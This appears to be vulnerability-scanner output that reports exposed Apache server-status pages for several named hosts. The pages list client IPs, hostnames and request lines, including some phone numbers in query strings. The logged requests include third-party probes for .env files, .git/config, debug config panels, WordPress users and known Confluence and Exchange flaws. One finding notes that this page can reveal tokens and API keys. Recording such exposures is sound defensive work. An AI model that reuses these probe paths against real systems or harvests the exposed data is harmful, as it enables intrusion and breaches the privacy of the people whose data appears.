Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:15 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 55 seconds Server load: 0.09 0.38 0.51 Total accesses: 20259818 - Total Traffic: 725.4 GB CPU Usage: u3378.35 s368.4 cu0 cs0 - .0603% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 5 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no13yes2160103 194454no4yes018013 251755no2yes018002 461164no15yes1170105 546522no6yes018051 6125153no4yes117040 7110199no6yes018051 899710no8yes018035 9100664no3yes018021 1085785no3yes117021 Sum10064 517504222 _R___________R________________________________________.......... ........_____W________________________________________R_________ ______________________________________________________________R_ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/371/94002_ 34.08000.09.003072.14 2.18.255.140http/1.1 0-0404470/386/94021R 34.120130.08.103027.16 188.166.147.46http/1.1client.simplismarter.com:443 0-0404470/382/93838_ 34.15020.04.113042.70 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0404470/375/93644_ 34.14000.09.853106.88 188.166.147.46http/1.1client.simplismarter.com:443GET /debug/default/view?panel=config HTTP/1.1 0-0404470/392/93881_ 34.14000.05.439251.75 2.18.255.105http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 0-0404470/378/93694_ 34.15000.07.323136.40 188.166.147.46http/1.1client.simplismarter.com:443GET /v2/_catalog HTTP/1.1 0-0404470/365/93811_ 34.14010.03.263033.50 2.18.255.105http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0404470/379/93920_ 34.12000.02.513105.25 2.18.255.73http/1.1crm.sprout.online:443GET /about HTTP/1.1 0-0404470/380/93923_ 33.93000.05.483111.28 2.18.255.140http/1.1 0-0404470/389/93742_ 33.910170.017.613204.24 2.18.255.140http/1.1 0-0404470/391/93851_ 34.06000.014.032995.42 2.18.255.56http/1.1 0-0404470/369/93882_ 33.950100.010.282985.03 2.18.255.56http/1.1 0-0404470/383/93860_ 34.07000.05.043027.44 188.166.147.46http/1.1 0-0404470/395/93660R 33.980100.05.003032.88 2.18.255.56http/1.1 0-0404470/388/93927_ 34.050210.011.862988.44 127.0.0.1http/1.1 0-0404470/384/93625_ 33.93000.04.873182.69 2.18.255.56http/1.1 0-0404470/389/93794_ 33.96000.06.803015.32 2.18.255.56http/1.1 0-0404470/379/93870_ 34.14000.09.423060.00 188.166.147.46http/1.1client.simplismarter.com:443GET /info.php HTTP/1.1 1-0944540/427/98988_ 86.752140.013.703174.88 2.18.255.56http/1.1 1-0944540/425/99008_ 86.391051150.018.053230.87 127.0.0.1http/1.1 1-0944540/410/98770_ 86.95000.012.153192.26 2.18.255.105http/1.1trmm.us:443GET /.env HTTP/1.1 1-0944540/418/98444_ 86.882010.014.533256.26 139.162.7.175http/1.1trmm.us:443HEAD / HTTP/1.1 1-0944540/420/98864_ 86.89800.015.899440.25 2.18.255.140http/1.1localhost:80HEAD / HTTP/1.1 1-0944540/421/98725_ 86.4920150.015.713139.65 139.162.7.175http/1.1 1-0944540/430/98937_ 86.74210.05.733143.20 2.18.255.140http/1.1 1-0944540/429/99017_ 86.96000.012.173122.97 188.166.147.46http/1.1client.simplismarter.com:443GET /api/search?folderIds=0 HTTP/1.1 1-0944540/429/99145_ 86.7417130.010.383174.74 127.0.0.1http/1.1 1-0944540/442/98816_ 86.8637720.015.313112.75 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/427/98656_ 86.8188140.023.983228.60 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0944540/423/98986_ 86.96000.019.383343.64 188.166.147.46http/1.1client.simplismarter.com:443GET /config.json HTTP/1.1 1-0944540/431/99134_ 86.96000.014.583314.31 188.166.147.46http/1.1client.simplismarter.com:443GET /login.action HTTP/1.1 1-0944540/414/99182_ 86.4457120.024.323260.74 127.0.0.1http/1.1 1-0944540/417/98922_ 86.750740.05.693206.38 2.18.255.56http/1.1 1-0944540/428/98749_ 86.7701590.011.119424.45 2.18.255.140http/1.1 1-0944540/434/98932_ 86.760150.017.253208.65 2.18.255.140http/1.1 1-0944540/440/99071_ 86.8010520.021.763257.09 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0517550/835/102871_ 131.0443170.020.583216.97 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/855/102726_ 130.8530180.032.213162.47 127.0.0.1http/1.1 2-0517550/832/102937_ 130.5778170.028.383393.79 127.0.0.1http/1.1 2-0517550/825/102950_ 131.063010.020.353177.55 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0517550/812/102770_ 131.026000.023.903349.39 79.104.53.14http/1.1trmm.us:80GET / HTTP/1.1 2-0517550/819/103075_ 131.0444840.024.553310.70 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/821/102792_ 130.96124910.035.343287.32 172.58.122.91http/1.1veew.info:443GET /?2cY&phn=5863397195 HTTP/1.1 2-0517550/858/103204_ 130.96123730.024.213330.72 172.58.122.91http/1.1veew.info:443POST /ajax.php HTTP/1.1 2-0517550/833/102666_ 131.14000.033.373174.36 188.166.147.46http/1.1client.simplismarter.com:443GET /s/33342e3230362e3131382e323531/_/;/META-INF/maven/com.atla 2-0517550/844/103060_ 130.96123690.025.363188.87 172.58.122.91http/1.1veew.info:443POST /ajax.php HTTP/1.1 2-0517550/829/102751_ 131.0079790.018.393309.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/851/102709_ 131.15090.035.193309.72 188.166.147.46http/1.1client.simplismarter.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0517550/830/102524_ 131.10100.020.51<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab9155626641343
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:42 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 36 seconds Server load: 0.58 1.14 0.95 Total accesses: 11911434 - Total Traffic: 388.3 GB CPU Usage: u2882.72 s296.39 cu0 cs0 - .0854% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 10 requests currently being processed, 170 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1111644no21yes6120104 222903no2yes018020 3107167no6yes018051 4112229no4yes117031 5121144no7yes117061 667151no6yes018041 918565no4yes018031 1136524no8yes117051 1436768no2yes018011 1542031no1yes117010 Sum10061 1017004011 ..................R_R____RRR_____W______________________________ _____________R____________W___________________________________.. ..................................__________________............ ......_______________R__....................................____ _______________________W________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0-0/0/54446. 188.421774160.00.001872.59 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54506. 188.371774230.00.001628.05 172.58.189.143http/1.1veew.info:443GET /js/jquery.mobile-1.3.0.min.js HTTP/1.1 0-0-0/0/54365. 188.39177400.00.001762.16 51.222.253.12http/1.1veew.info:443GET /robots.txt HTTP/1.1 0-0-0/0/54403. 188.461774100.00.001798.21 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0-0/0/54474. 188.351774110.00.001693.13 172.58.189.143http/1.1veew.info:443GET /css/jquery.mobile-1.3.0.min.css HTTP/1.1 0-0-0/0/54340. 188.191774560.00.001621.90 51.222.253.12http/1.1 0-0-0/0/54720. 188.3017741370.00.001745.04 127.0.0.1http/1.1 0-0-0/0/54371. 188.421774540.00.001721.29 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 0-0-0/0/54491. 188.431774140.00.001605.33 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54383. 188.431774300.00.001718.61 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0-0/0/54484. 188.3817741800.00.001766.88 172.58.189.143http/1.1veew.info:443GET /loader.gif HTTP/1.1 0-0-0/0/54375. 188.421774200.00.001645.23 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54318. 188.38177420.00.001768.49 172.58.189.143http/1.1veew.info:443GET /js/validate-1.2.js HTTP/1.1 0-0-0/0/54533. 188.441774150.00.001721.76 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54341. 188.38177440.00.001737.58 172.58.189.143http/1.1veew.info:443GET /js/bootstrap-3.3.7.min.js HTTP/1.1 0-0-0/0/54402. 188.341774740.00.001704.82 172.58.189.143http/1.1veew.info:443GET /?1Fr&phn=2025208103 HTTP/1.1 0-0-0/0/54446. 188.43177416840.00.001695.81 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0-0/0/54331. 188.171774240.00.001783.76 172.58.189.143http/1.1 1-01116440/247/55612R 22.240810.013.151759.69 95.101.88.77http/1.1crm.sprout.online:443GET / HTTP/1.1 1-01116440/245/55313_ 22.280210.012.671702.82 95.101.88.100http/1.1trmm.us:443GET /server-status HTTP/1.1 1-01116440/246/55451R 22.070260.07.411705.27 164.92.240.121http/1.1 1-01116440/223/55464_ 22.30010.07.371786.48 95.101.88.126http/1.1crm.sprout.online:443GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/227/55421_ 22.170170.06.747937.64 95.101.88.45http/1.1 1-01116440/250/55489_ 22.24010.01.541725.60 95.101.88.126http/1.1crm.sprout.online:443GET /.git/config HTTP/1.1 1-01116440/233/55534_ 22.25000.010.141685.07 95.101.88.100http/1.1trmm.us:443GET / HTTP/1.1 1-01116440/223/55672R 22.08020.09.701649.15 95.101.88.45http/1.1 1-01116440/241/55834R 22.240140.02.761730.20 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-01116440/236/55601R 22.033120.04.101667.82 195.211.77.140http/1.1 1-01116440/238/55672_ 22.15000.06.957903.58 95.101.88.77http/1.1 1-01116440/243/55409_ 22.280870.04.201690.65 95.101.88.100http/1.1crm.sprout.online:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-01116440/233/55443_ 22.250140.09.391606.62 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-01116440/228/55355_ 22.29000.09.531786.52 95.101.88.100http/1.1crm.sprout.online:443GET /telescope/requests HTTP/1.1 1-01116440/227/55269_ 22.25000.04.181645.65 95.101.88.126http/1.1trmm.us:443GET /.env HTTP/1.1 1-01116440/241/55598W 22.02100.010.291698.34 172.10.230.28http/1.1veew.info:443GET /loader.gif HTTP/1.1 1-01116440/235/55284_ 22.29010.01.641699.31 95.101.88.126http/1.1crm.textripple.com:443GET /.vscode/.DS_Store HTTP/1.1 1-01116440/231/55345_ 22.24010.08.201679.76 95.101.88.126http/1.1crm.textripple.com:443GET /.DS_Store HTTP/1.1 2-0229030/821/59595_ 109.75231520.036.611946.19 127.0.0.1http/1.1 2-0229030/859/59771_ 109.768160.045.221932.58 95.101.88.77http/1.1 2-0229030/822/59553_ 109.8237160.051.801915.17 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/857/60102_ 109.842100.049.341712.93 96.7.74.198http/1.1trmm.us:443GET /public/mms/20220518_184039_UTC_de12aa846d_0.png HTTP/1.1 2-0229030/849/59817_ 109.833213520.044.241872.87 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 2-0229030/818/59818_ 109.8237140.045.341928.60 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/839/59997_ 109.810170.045.231876.02 95.101.88.77http/1.1 2-0229030/841/59780_ 109.90010.048.081881.13 95.101.88.100http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0229030/811/59780_ 109.877200.062.181860.43 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0229030/835/59808_ 109.8237670.049.021853.85 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/838/59649_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab91556773974f8
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:42 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 36 seconds Server load: 0.58 1.14 0.95 Total accesses: 11911401 - Total Traffic: 388.3 GB CPU Usage: u2882.49 s296.34 cu0 cs0 - .0854% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 29 requests currently being processed, 151 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1111644no17yes711082 222903no2yes216000 3107167no5yes216021 4112229no4yes216011 5121144no4yes315031 667151no6yes513011 918565no4yes216011 1136524no7yes414011 1436768no2yes018011 1542031no0yes216000 Sum10051 291510189 .................._R____R__R_R__RW_R_______R_____R______________ _R_L______R______R__________________RR_R_____R_________RR_R_R_.. ..................................R___R_____________............ ......R__RR__R__________....................................____ ______________________________RW................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0-0/0/54446. 188.421774160.00.001872.59 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54506. 188.371774230.00.001628.05 172.58.189.143http/1.1veew.info:443GET /js/jquery.mobile-1.3.0.min.js HTTP/1.1 0-0-0/0/54365. 188.39177400.00.001762.16 51.222.253.12http/1.1veew.info:443GET /robots.txt HTTP/1.1 0-0-0/0/54403. 188.461774100.00.001798.21 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0-0/0/54474. 188.351774110.00.001693.13 172.58.189.143http/1.1veew.info:443GET /css/jquery.mobile-1.3.0.min.css HTTP/1.1 0-0-0/0/54340. 188.191774560.00.001621.90 51.222.253.12http/1.1 0-0-0/0/54720. 188.3017741370.00.001745.04 127.0.0.1http/1.1 0-0-0/0/54371. 188.421774540.00.001721.29 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 0-0-0/0/54491. 188.431774140.00.001605.33 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54383. 188.431774300.00.001718.61 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0-0/0/54484. 188.3817741800.00.001766.88 172.58.189.143http/1.1veew.info:443GET /loader.gif HTTP/1.1 0-0-0/0/54375. 188.421774200.00.001645.23 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54318. 188.38177420.00.001768.49 172.58.189.143http/1.1veew.info:443GET /js/validate-1.2.js HTTP/1.1 0-0-0/0/54533. 188.441774150.00.001721.76 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54341. 188.38177440.00.001737.58 172.58.189.143http/1.1veew.info:443GET /js/bootstrap-3.3.7.min.js HTTP/1.1 0-0-0/0/54402. 188.341774740.00.001704.82 172.58.189.143http/1.1veew.info:443GET /?1Fr&phn=2025208103 HTTP/1.1 0-0-0/0/54446. 188.43177416840.00.001695.81 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0-0/0/54331. 188.171774240.00.001783.76 172.58.189.143http/1.1 1-01116440/247/55612_ 22.240810.013.151759.69 95.101.88.77http/1.1crm.sprout.online:443GET / HTTP/1.1 1-01116440/244/55312R 22.13050.012.651702.80 95.101.88.100http/1.1 1-01116440/246/55451_ 22.070260.07.411705.27 164.92.240.121http/1.1 1-01116440/222/55463_ 22.24000.07.361786.48 95.101.88.100http/1.1crm.sprout.online:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-01116440/227/55421_ 22.170170.06.747937.64 95.101.88.77http/1.1 1-01116440/250/55489_ 22.24010.01.541725.60 95.101.88.126http/1.1crm.sprout.online:443GET /.git/config HTTP/1.1 1-01116440/232/55533R 22.19000.010.131685.07 95.101.88.100http/1.1 1-01116440/223/55672_ 22.08020.09.701649.15 95.101.88.45http/1.1 1-01116440/241/55834_ 22.240140.02.761730.20 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-01116440/236/55601R 22.032120.04.101667.82 195.211.77.140http/1.1 1-01116440/238/55672_ 22.15000.06.957903.58 95.101.88.77http/1.1 1-01116440/242/55408R 22.19000.04.141690.59 95.101.88.100http/1.1 1-01116440/232/55442_ 22.16010.09.391606.62 95.101.88.77http/1.1 1-01116440/227/55354_ 22.190100.09.521786.51 95.101.88.45http/1.1 1-01116440/226/55268R 22.190820.04.171645.64 95.101.88.126http/1.1 1-01116440/241/55598W 22.02100.010.291698.34 172.10.230.28http/1.1veew.info:443GET /loader.gif HTTP/1.1 1-01116440/234/55283_ 22.110210.01.641699.31 95.101.88.77http/1.1 1-01116440/230/55344R 22.120200.08.181679.74 95.101.88.126http/1.1 2-0229030/821/59595_ 109.75231520.036.611946.19 127.0.0.1http/1.1 2-0229030/859/59771_ 109.767160.045.221932.58 95.101.88.77http/1.1 2-0229030/822/59553_ 109.8236160.051.801915.17 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/857/60102_ 109.842100.049.341712.93 96.7.74.198http/1.1trmm.us:443GET /public/mms/20220518_184039_UTC_de12aa846d_0.png HTTP/1.1 2-0229030/849/59817_ 109.833213520.044.241872.87 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 2-0229030/818/59818_ 109.8237140.045.341928.60 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/839/59997_ 109.8142170.045.231876.02 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0229030/840/59779R 109.8043160.048.071881.12 95.101.88.100http/1.1 2-0229030/811/59780_ 109.876200.062.181860.43 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0229030/835/59808_ 109.8237670.049.021853.85 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/837/59648_ 109.8142150.054.491908.23 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0229030/861/59891_ 109.8142170.030.27<
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d320a0b5d787
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 23-Dec-2023 20:43:52 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 11 days 2 hours 55 minutes 31 seconds Server load: 0.02 0.04 0.06 Total accesses: 261423 - Total Traffic: 15.2 GB CPU Usage: u726.98 s139.97 cu0 cs0 - .0902% CPU load .272 requests/sec - 16.6 kB/second - 61.1 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 010044no0yes018000 1114846no1yes018010 2105935no0yes018000 39765no0yes018000 4106151no0yes018000 5123272no0yes018000 619783no1yes117010 79491no0yes018000 85337no0yes018000 949846no0yes018000 Sum1002 1179020 ________________________________________________________________ ______________________________________________W_________________ ____________________________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0100440/410/937_ 130.20152110.07.2732.85 127.0.0.1http/1.1 0-0100440/395/925_ 130.9787310.02.733.79 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/397/910_ 130.7411810.05.579.09 127.0.0.1http/1.1 0-0100440/412/927_ 130.2787310.05.716.69 127.0.0.1http/1.1 0-0100440/388/906_ 130.83138310.02.374.08 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/416/942_ 131.0558810.09.7011.51 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/388/895_ 130.55138300.02.853.92 127.0.0.1http/1.1 0-0100440/371/914_ 130.93101010.02.433.34 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/374/879_ 130.25101010.02.904.87 127.0.0.1http/1.1 0-0100440/398/939_ 130.78157810.05.557.46 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/374/904_ 130.51157810.06.608.12 127.0.0.1http/1.1 0-0100440/377/879_ 130.3581310.07.007.84 127.0.0.1http/1.1 0-0100440/381/901_ 130.4158810.05.156.01 127.0.0.1http/1.1 0-0100440/393/923_ 131.1711800.02.443.46 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2619143066496 HT 0-0100440/414/930_ 130.9981310.01.772.91 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/406/930_ 130.7350710.05.907.54 127.0.0.1http/1.1 0-0100440/410/921_ 130.80152110.08.619.87 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/385/906_ 130.492610.01.964.06 127.0.0.1http/1.1 1-01148460/146/660_ 35.9828300.02.336.76 135.125.218.67http/1.1localhost:443GET /.env HTTP/1.1 1-01148460/151/680_ 36.0023800.01.003.25 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2619022981233 HT 1-01148460/153/697_ 35.7928310.04.957.73 135.125.218.67http/1.1 1-01148460/146/677_ 35.8023810.02.784.28 127.0.0.1http/1.1 1-01148460/155/681_ 36.0218310.01.574.34 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/151/678_ 35.8418310.03.246.91 127.0.0.1http/1.1 1-01148460/141/660_ 36.0121310.01.445.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/150/704_ 36.06400.00.464.85 168.143.243.31http/1.1localhost:80GET / HTTP/1.1 1-01148460/153/687_ 35.7021310.00.612.81 127.0.0.1http/1.1 1-01148460/161/652_ 36.07200.00.532.12 168.143.243.30http/1.1localhost:80GET / HTTP/1.1 1-01148460/148/668_ 35.547710.03.055.03 24.107.74.211http/1.1 1-01148460/155/675_ 36.07100.00.415.49 168.143.243.30http/1.1localhost:80GET /.vscode/sftp.json HTTP/1.1 1-01148460/169/703_ 36.07100.02.186.25 168.143.243.30http/1.1localhost:80GET /debug/default/view?panel=config HTTP/1.1 1-01148460/146/667_ 36.07200.02.273.49 168.143.243.31http/1.1localhost:80GET / HTTP/1.1 1-01148460/166/685_ 36.07000.00.383.97 168.143.243.30http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-01148460/154/665_ 35.9926100.02.164.76 124.225.164.130http/1.1mhvip.biz:80GET / HTTP/1.1 1-01148460/150/677_ 35.7846710.03.016.73 127.0.0.1http/1.1 1-01148460/154/692_ 35.8025310.02.435.03 104.28.39.30http/1.1 2-01059350/518/518_ 268.7836300.04.654.65 127.0.0.1http/1.1 2-01059350/512/512_ 268.7539310.03.353.35 127.0.0.1http/1.1 2-01059350/476/476_ 269.3034810.02.722.72 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/502/502_ 268.7934800.03.693.69 127.0.0.1http/1.1 2-01059350/482/482_ 269.3036310.05.765.76 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/490/490_ 269.3230310.08.598.59 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/468/468_ 269.3424310.05.705.70 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/529/529_ 269.40310.02.272.27 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/508/508_ 268.8130300.02.492.49 127.0.0.1http/1.1 2-01059350/491/491_ 268.6524300.02.202.20 127.0.0.1http/1.1 2-01059350/470/470_ 269.3517800.02.142.14 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2619083006529 HT 2-01059350/508/508_ 268.6617800.03.133.13 127.0.0.1http/1.1 2-01059350/489/489_ 269.27310.06.336.33 127.0.0.1http/1.1 2-01059350/476/476_ 269.256610.02.302.30 127.0.0.1http/1.1 2-01059350/471/471_ 268.6329800.03.823.82 1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d32067a13b3a
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:05 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 44 seconds Server load: 1.22 0.81 0.33 Total accesses: 431 - Total Traffic: 7.2 MB CPU Usage: u4.12 s.5 cu0 cs0 - .46% CPU load .429 requests/sec - 7.3 kB/second - 17.0 kB/request 2 requests currently being processed, 178 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no3yes018030 6106024no1yes018010 7106043no1yes018000 8106065no3yes216030 9107415no0yes018000 Sum1009 2178080 ________________________________________________________________ ________________________________________________________________ __________________________R__W______________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016790.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516400.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516410.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279210.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059200.00.000.00 